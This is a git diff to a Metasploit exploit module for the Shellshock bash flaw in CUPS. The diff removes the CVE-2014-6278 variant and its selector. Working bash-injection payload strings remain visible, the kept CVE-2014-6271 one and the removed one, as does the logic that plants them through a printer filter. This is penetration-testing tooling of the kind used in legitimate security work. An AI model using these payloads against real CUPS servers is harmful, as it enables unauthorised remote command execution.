diff --git a/modules/exploits/multi/http/cups_bash_env_exec.rb b/modules/exploits/multi/http/cups_bash_env_exec.rb index 8e438ee97a..dc955504f0 100644 --- a/modules/exploits/multi/http/cups_bash_env_exec.rb +++ b/modules/exploits/multi/http/cups_bash_env_exec.rb @@ -19,7 +19,6 @@ class Metasploit4 < Msf::Exploit::Remote }, 'Author' => [ 'Stephane Chazelas', # Vulnerability discovery - 'lcamtuf', # CVE-2014-6278 'Brendan Coles ' # msf ], 'References' => [ @@ -54,7 +53,6 @@ class Metasploit4 < Msf::Exploit::Remote OptBool.new('SSL', [ true, 'Use SSL', true ]), OptString.new('USERNAME', [ true, 'CUPS username', 'root']), OptString.new('PASSWORD', [ true, 'CUPS user password', '']), - OptEnum.new('CVE', [ true, 'CVE to exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278'] ]), OptString.new('RPATH', [ true, 'Target PATH for binaries', '/bin' ]) ], self.class) end @@ -66,13 +64,6 @@ class Metasploit4 < Msf::Exploit::Remote %{() { :;}; $(#{cmd}) & } end - # - # CVE-2014-6278 - # - def cve_2014_6278(cmd) - %{() { _; } >_[$($())] { $(#{cmd}) & }} - end - # # Check credentials # @@ -107,17 +98,9 @@ class Metasploit4 < Msf::Exploit::Remote @cookie = rand_text_alphanumeric(16) printer_name = rand_text_alphanumeric(10 + rand(5)) - # Select target CVE - case datastore['CVE'] - when 'CVE-2014-6278' - cmd = cve_2014_6278(payload.raw) - else - cmd = cve_2014_6271(payload.raw) - end - # Add a printer containing the payload # with a CUPS filter pointing to /bin/bash - res = add_printer(printer_name, cmd) + res = add_printer(printer_name, cve_2014_6271(payload.raw)) if !res fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.") elsif res.body =~ /Set Default Options for #{printer_name}/